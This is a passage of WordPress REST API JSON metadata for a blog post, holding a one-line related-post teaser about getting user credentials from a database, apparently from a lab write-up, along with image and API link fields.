By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/434","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=434"}],"version-history":[{"count":2,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/434\/revisions"}],"predecessor-version":[{"id":436,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/434\/revisions\/436"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=434"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=434"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=434"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated"
:true}]}}